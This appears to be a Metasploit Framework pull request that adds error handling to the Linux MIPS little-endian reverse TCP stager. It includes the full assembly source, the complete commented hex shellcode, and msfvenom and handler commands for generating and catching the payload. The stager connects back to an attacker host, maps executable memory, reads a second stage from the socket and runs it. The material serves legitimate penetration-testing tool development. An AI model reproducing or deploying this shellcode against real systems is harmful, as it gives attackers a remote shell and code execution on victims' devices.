### PR TITLE
add error handling to mipsle linux reverse tcp stager

### DIFF
--- a/external/source/shellcode/linux/mipsle/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s
@@ -1,11 +1,11 @@
 ##
-# 
+#
 #        Name: stager_sock_reverse
 #        Type: Stager
 #   Qualities: No Nulls out of the IP / Port data
 #   Platforms: Linux MIPS Little Endian
 #     Authors: juan vazquez <juan.vazquez [at] metasploit.com>
-#     License: 
+#     License:
 #
 #        This file is part of the Metasploit Exploit Framework
 #        and is subject to the same licenses and copyrights as
@@ -27,101 +27,119 @@
 #        generate the string to place on:
 #          modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
 ##
-	.text
-	.align  2
-	.globl  main
-	.set    nomips16
+  .text
+  .align  2
+  .globl  main
+  .set    nomips16
 main:
-	.set    noreorder
-	.set    nomacro
+  .set    noreorder
+  .set    nomacro
 
-	# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
-	# a0: domain = PF_INET (2)
-	# a1: type = SOCK_STREAM (2)
-	# a2: protocol = IPPROTO_IP (0)
-	# v0: syscall = __NR_socket (4183)
-	li      $t7, -6
-	nor     $t7, $t7, $zero
-	addi    $a0, $t7, -3
-	addi    $a1, $t7, -3
-	slti    $a2, $zero, -1
-	li      $v0, 4183
-	syscall 0x40404
-	sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
-	
-	# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
-	# a0: sockfd
-	# a1: addr = AF_INET (2)
-	# a2: addrlen = 16
-	# v0: syscall = __NR_connect (4170)
-	lw      $a0, -4($sp)
-	li      $t7, -3
-	nor     $t7, $t7, $zero
-	sw      $t7, -30($sp)
-	ori     $t6, $zero, 0x5c11  # port
-	sw      $t6, -28($sp)
-	lui     $t6, 0x100          # ip
-	ori     $t6, $t6, 0x7f      # ip
-	sw      $t6, -26($sp)
-	addiu   $a1, $sp, -30
-	li      $t4, -17
-	nor     $a2, $t4, $zero
-	li      $v0, 4170
-	syscall 0x40404
-	
-	# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
-	# a0: addr = -1
-	# a1: lenght = 4096
-	# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
-	# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
-	# sp(16): fd = -1
-	# sp(20): offset = 0
-	# v0: syscall = __NR_mmap (4090)
-	li      $a0, -1
-	li      $a1, 4097
-	addi    $a1, $a1, -1
-	li      $t1, -8
-	nor     $t1, $t1, $0
-	add     $a2, $t1, $0
-	li      $a3, 2050
-	li      $t3, -22
-	nor     $t3, $t3, $zero
-	add     $t3, $sp, $t3
-	sw      $0, -1($t3)         # Doesn't use $sp directly to avoid nulls
-	sw      $2, -5($t3)         # Doesn't use $sp directly to avoid nulls
-	li      $v0, 4090
-	syscall 0x40404
-	sw      $v0, -8($sp)        # Stores the mmap'ed address on the stack
+  # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
+  # a0: domain = PF_INET (2)
+  # a1: type = SOCK_STREAM (2)
+  # a2: protocol = IPPROTO_IP (0)
+  # v0: syscall = __NR_socket (4183)
+  li      $t7, -6
+  nor     $t7, $t7, $zero
+  addi    $a0, $t7, -3
+  addi    $a1, $t7, -3
+  slti    $a2, $zero, -1
+  li      $v0, 4183
+  syscall 0x40404
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed
+  sw      $v0, -4($sp) # store the file descriptor for the socket on the stack
 
-	# read(sockfd, addr, 4096)
-	# a0: sockfd
-	# a1: addr
-	# a2: len = 4096
-	# v0: syscall = __NR_read (4003)
-	lw      $a0, -4($sp)
-	lw      $a1, -8($sp)
-	li      $a2, 4097
-	addi    $a2, $a2, -1
-	li      $v0, 4003
-	syscall 0x40404
+  # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
+  # a0: sockfd
+  # a1: addr = AF_INET (2)
+  # a2: addrlen = 16
+  # v0: syscall = __NR_connect (4170)
+  lw      $a0, -4($sp)
+  li      $t7, -3
+  nor     $t7, $t7, $zero
+  sw      $t7, -30($sp)
+  ori     $t6, $zero, 0x5c11  # port
+  sw      $t6, -28($sp)
+  lui     $t6, 0x100          # ip
+  ori     $t6, $t6, 0x7f      # ip
+  sw      $t6, -26($sp)
+  addiu   $a1, $sp, -30
+  li      $t4, -17
+  nor     $a2, $t4, $zero
+  li      $v0, 4170
+  syscall 0x40404
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed
 
-	# cacheflush(addr, nbytes, DCACHE)
-	# a0: addr
-	# a1: nbytes
-	# a2: cache = DCACHE (2)
-	# v0: syscall = __NR_read (4147)
-	lw      $a0, -8($sp)
-	add     $a1, $v0, $zero
-	li      $t1, -3
-	nor     $t1, $t1, $0
-	add     $a2, $t1, $0
-	li      $v0, 4147
-	syscall 0x40404
-	
-	# jmp to the stage
-	lw      $s1, -8($sp)
-	lw      $s2, -4($sp)        # sockfd saved on $s2
-	jalr    $s1
+  # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
+  # a0: addr = -1
+  # a1: lenght = 4096
+  # a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
+  # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
+  # sp(16): fd = -1
+  # sp(20): offset = 0
+  # v0: syscall = __NR_mmap (4090)
+  li      $a0, -1
+  li      $a1, 4097
+  addi    $a1, $a1, -1
+  li      $t1, -8
+  nor     $t1, $t1, $0
+  add     $a2, $t1, $0
+  li      $a3, 2050
+  li      $t3, -22
+  nor     $t3, $t3, $zero
+  add     $t3, $sp, $t3
+  sw      $0, -1($t3)         # Doesn't use $sp directly to avoid nulls
+  sw      $2, -5($t3)         # Doesn't use $sp directly to avoid nulls
+  li      $v0, 4090
+  syscall 0x40404
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed
+  sw      $v0, -8($sp)        # Stores the mmap'ed address on the stack
 
-	.set    macro
-	.set    reorder
+  # read(sockfd, addr, 4096)
+  # a0: sockfd
+  # a1: addr
+  # a2: len = 4096
+  # v0: syscall = __NR_read (4003)
+  lw      $a0, -4($sp)
+  lw      $a1, -8($sp)
+  li      $a2, 4097
+  addi    $a2, $a2, -1
+  li      $v0, 4003
+  syscall 0x40404
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed
+
+  # cacheflush(addr, nbytes, DCACHE)
+  # a0: addr
+  # a1: nbytes
+  # a2: cache = DCACHE (2)
+  # v0: syscall = __NR_read (4147)
+  lw      $a0, -8($sp)
+  add     $a1, $v0, $zero
+  li      $t1, -3
+  nor     $t1, $t1, $0
+  add     $a2, $t1, $0
+  li      $v0, 4147
+  syscall 0x40404
+  slt     $s0, $zero, $a3
+  bne     $s0, $zero, failed
+
+  # jmp to the stage
+  lw      $s1, -8($sp)
+  lw      $s2, -4($sp)        # sockfd saved on $s2
+  jalr    $s1
+
+failed:
+  # exit(status)
+  # a0: status
+  # v0: syscall = __NR_exit (4001)
+  li      $a0, 1
+  li      $v0, 4001
+  syscall 0x40404
+
+  .set    macro
+  .set    reorder

--- a/external/source/shellcode/linux/mipsle/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s
@@ -4,7 +4,7 @@
 #        Type: Stager
 #   Qualities: No Nulls out of the IP / Port data
 #   Platforms: Linux MIPS Little Endian
-#     Authors: juan vazquez <juan.vazquez [at] metasploit.com>
+#     Authors: juan vazquez <juan.vazquez [at] metasploit.com>, tkmru
 #     License:
 #
 #        This file is part of the Metasploit Exploit Framework

--- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
@@ -20,7 +20,8 @@ module MetasploitModule
       'Description'   => 'Connect back to the attacker',
       'Author'        =>
         [
-          'juan vazquez'
+          'juan vazquez',
+          'tkmru'
         ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
@@ -30,26 +31,78 @@ module MetasploitModule
         {
           'Offsets' =>
             {
-              'LHOST' => [ [60, 56], 'ADDR16MSB' ],
-              'LPORT' => [ 48, 'n'    ],
+              'LHOST' => [ [68, 64], 'ADDR16MSB' ],
+              'LPORT' => [ 56, 'n' ],
             },
           'Payload' =>
-            "\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd\xff" +
-            "\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01" +
-            "\xfc\xff\xa2\xaf\xfc\xff\xa4\x8f\xfd\xff\x0f\x24\x27\x78" +
-            "\xe0\x01\xe2\xff\xaf\xaf\x11\x5c\x0e\x34\xe4\xff\xae\xaf" +
-            "\x00\x01\x0e\x3c\x7f\x00\xce\x35\xe6\xff\xae\xaf\xe2\xff" +
-            "\xa5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" +
-            "\x0c\x01\x01\x01\xff\xff\x04\x24\x01\x10\x05\x24\xff\xff" +
-            "\xa5\x20\xf8\xff\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01" +
-            "\x02\x08\x07\x24\xea\xff\x0b\x24\x27\x58\x60\x01\x20\x58" +
-            "\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
-            "\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
-            "\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
-            "\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
-            "\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
-            "\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
-            "\x20\x02"
+            "\xfa\xff\x0f\x24" +  #  li t7,-6
+            "\x27\x78\xe0\x01" +  #  nor   t7,t7,zero
+            "\xfd\xff\xe4\x21" +  #  addi  a0,t7,-3
+            "\xfd\xff\xe5\x21" +  #  addi  a1,t7,-3
+            "\xff\xff\x06\x28" +  #  slti  a2,zero,-1
+            "\x57\x10\x02\x24" +  #  li v0,4183
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x2a\x80\x07\x00" +  #  slt   s0,zero,a3
+            "\x36\x00\x00\x16" +  #  bnez  s0,0x4006bc <failed>
+            "\xfc\xff\xa2\xaf" +  #  sw v0,-4(sp)
+            "\xfc\xff\xa4\x8f" +  #  lw a0,-4(sp)
+            "\xfd\xff\x0f\x24" +  #  li t7,-3
+            "\x27\x78\xe0\x01" +  #  nor   t7,t7,zero
+            "\xe2\xff\xaf\xaf" +  #  sw t7,-30(sp)
+            "\x11\x5c\x0e\x34" +  #  li t6,0x5c11
+            "\xe4\xff\xae\xaf" +  #  sw t6,-28(sp)
+            "\x00\x01\x0e\x3c" +  #  lui   t6,0x100
+            "\x7f\x00\xce\x35" +  #  ori   t6,t6,0x7f
+            "\xe6\xff\xae\xaf" +  #  sw t6,-26(sp)
+            "\xe2\xff\xa5\x27" +  #  addiu a1,sp,-30
+            "\xef\xff\x0c\x24" +  #  li t4,-17
+            "\x27\x30\x80\x01" +  #  nor   a2,t4,zero
+            "\x4a\x10\x02\x24" +  #  li v0,4170
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x2a\x80\x07\x00" +  #  slt   s0,zero,a3
+            "\x25\x00\x00\x16" +  #  bnez  s0,0x4006bc <failed>
+            "\xff\xff\x04\x24" +  #  li a0,-1
+            "\x01\x10\x05\x24" +  #  li a1,4097
+            "\xff\xff\xa5\x20" +  #  addi  a1,a1,-1
+            "\xf8\xff\x09\x24" +  #  li t1,-8
+            "\x27\x48\x20\x01" +  #  nor   t1,t1,zero
+            "\x20\x30\x20\x01" +  #  add   a2,t1,zero
+            "\x02\x08\x07\x24" +  #  li a3,2050
+            "\xea\xff\x0b\x24" +  #  li t3,-22
+            "\x27\x58\x60\x01" +  #  nor   t3,t3,zero
+            "\x20\x58\xab\x03" +  #  add   t3,sp,t3
+            "\xff\xff\x60\xad" +  #  sw zero,-1(t3)
+            "\xfb\xff\x62\xad" +  #  sw v0,-5(t3)
+            "\xfa\x0f\x02\x24" +  #  li v0,4090
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x2a\x80\x07\x00" +  #  slt   s0,zero,a3
+            "\x15\x00\x00\x16" +  #  bnez  s0,0x4006bc <failed>
+            "\xf8\xff\xa2\xaf" +  #  sw v0,-8(sp)
+            "\xfc\xff\xa4\x8f" +  #  lw a0,-4(sp)
+            "\xf8\xff\xa5\x8f" +  #  lw a1,-8(sp)
+            "\x01\x10\x06\x24" +  #  li a2,4097
+            "\xff\xff\xc6\x20" +  #  addi  a2,a2,-1
+            "\xa3\x0f\x02\x24" +  #  li v0,4003
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x2a\x80\x07\x00" +  #  slt   s0,zero,a3
+            "\x0c\x00\x00\x16" +  #  bnez  s0,0x4006bc <failed>
+            "\xf8\xff\xa4\x8f" +  #  lw a0,-8(sp)
+            "\x20\x28\x40\x00" +  #  add   a1,v0,zero
+            "\xfd\xff\x09\x24" +  #  li t1,-3
+            "\x27\x48\x20\x01" +  #  nor   t1,t1,zero
+            "\x20\x30\x20\x01" +  #  add   a2,t1,zero
+            "\x33\x10\x02\x24" +  #  li v0,4147
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x2a\x80\x07\x00" +  #  slt   s0,zero,a3
+            "\x03\x00\x00\x16" +  #  bnez  s0,0x4006bc <failed>
+            "\xf8\xff\xb1\x8f" +  #  lw s1,-8(sp)
+            "\xfc\xff\xb2\x8f" +  #  lw s2,-4(sp)
+            "\x09\xf8\x20\x02" +  #  jalr  s1
+            "\x01\x00\x04\x24" +  #  li a0,1
+            "\xa1\x0f\x02\x24" +  #  li v0,4001
+            "\x0c\x01\x01\x01" +  #  syscall  0x40404
+            "\x25\x08\x20\x00" +  #  move  at,at
+            "\x25\x08\x20\x00"    #  move  at,at
         }
       ))
   end

--- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 212
+  CachedSize = 272
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux


### PR DESCRIPTION
I add error handling to mipsle linux reverse tcp. for [Linux reverse_tcp stager segfaults when it can't connect · Issue #7722 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/7722).

## Verification

List the steps needed to make sure this thing works

- [ ] ./msfconsole -qx "use exploit/multi/handler; set payload linux/mipsle/shell/reverse_tcp; set lhost ip_addr; set lport port; set ExitOnSession false; run -j"
- [ ] follow commands

```
$ ./msfvenom -p linux/mipsle/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ./stager_sock_reverse.elf
$ sudo chmod +x ./stager_sock_reverse.elf
$ strace ./stager_sock_reverse.elf
execve("./stager_sock_reverse.elf", ["./stager_sock_reverse.elf"], [/* 14 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused)
exit(1)                                 = ?
```
